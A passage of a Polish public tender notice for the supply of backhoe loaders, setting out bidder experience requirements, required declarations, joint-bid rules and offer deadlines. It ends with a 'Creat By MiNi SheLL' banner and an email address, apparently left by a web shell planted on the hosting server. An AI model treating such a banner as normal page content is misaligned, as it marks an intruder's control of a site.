zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie określa w tym zakresie żadnych warunków.<br/>b)	Zdolności technicznej lub zawodowej:<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 zamówienia polegające na realizacji dostaw - zamówień o podobnym stopniu komplikacji i specyfice, tj. dostawy koparko-ładowarek, o wartości każdego z zadań min. 250 000,00 zł brutto (słownie złotych: dwieście pięćdziesiąt tysięcy). W przypadku, jeżeli wartość zamówienia wyrażona została w umowie w walucie obcej – równowartość tej kwoty w zł brutto wg średniego kursu NBP z dnia zawarcia umowy o wykonanie zamówienia.<br/>c) Sytuacji ekonomicznej i finansowej: <br/>Zamawiający nie określa w tym zakresie żadnych warunków. <br/>d) Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa w tym zakresie żadnych warunków. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">-Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 6 do SWZ. <br/>-Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>-Wykaz dostaw wykonanych nie wcześniej niż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, stanowiący oświadczenie zgodne z treścią Załącznika nr 5 do SWZ. Wykaz wykonanych dostaw.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">-Aktualne na dzień składania ofert oświadczenie dotyczące spełniania warunków udziału w postępowaniu stanowiące wstępne potwierdzenie, że Wykonawca spełnia warunki udziału w postępowaniu, zgodne z treścią Załącznika nr 3 do SWZ; <br/>-Aktualne na dzień składania ofert oświadczenie dotyczące przesłanek wykluczenia z postępowania stanowiące wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu z udziału w postępowaniu, zgodne z treścią Załącznika nr 4 do SWZ;<br/>-W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, ww. oświadczenia składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. <br/>-Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zmówienia - zobowiązanie powinno być podpisane przez osoby upoważnione do reprezentowania tych podmiotów.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający wraz z ofertą wymaga złożenia przedmiotowych środków dowodowych:<br/>a) Deklarację zgodności z CE <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Deklarację zgodności z CE <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, ww. oświadczenia<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te<br/>potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w<br/>zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu oraz brak podstaw wykluczenia.<br/>Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów musi udowodnić<br/>Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych<br/>podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji zmówienia - zobowiązanie powinno być<br/>podpisane przez osoby upoważnione do reprezentowania tych podmiotów.<br/>Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia<br/>wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich<br/>zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w<br/>oświadczeniach (Aktualne na dzień składania ofert oświadczenie dotyczące spełniania<br/>warunków udziału w postępowaniu stanowiące wstępne potwierdzenie, że Wykonawca spełnia<br/>warunki udziału w postępowaniu. <br/>Dokumenty z których wynika prawo do podpisania oferty: odpis lub informacja<br/>z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru, pełnomocnictwo lub inny dokument<br/>potwierdzający umocowanie do reprezentowania Wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty i powinno ono zawierać w szczególności<br/>wskazanie:<br/>a) postępowania o udzielenie zamówienia publicznego, którego dotyczy,<br/>b) wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia,<br/>c) ustanowienie pełnomocnika oraz zakresu jego umocowania.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument<br/>Oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału, o którym mowa, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału<br/>w postępowaniu.<br/>Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców:<br/>- warunek dotyczący wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z<br/>wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane;<br/>- wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy; <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami wzoru umowy, który stanowi załącznik do SWZ oraz zakresie uregulowanym<br/>w art. 454 – 455 ustawy Pzp <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-27 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć za pośrednictwem platformy zakupowej pod adresem https://platformazakupowa.pl/pn/ciechocin</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-27 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-25</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com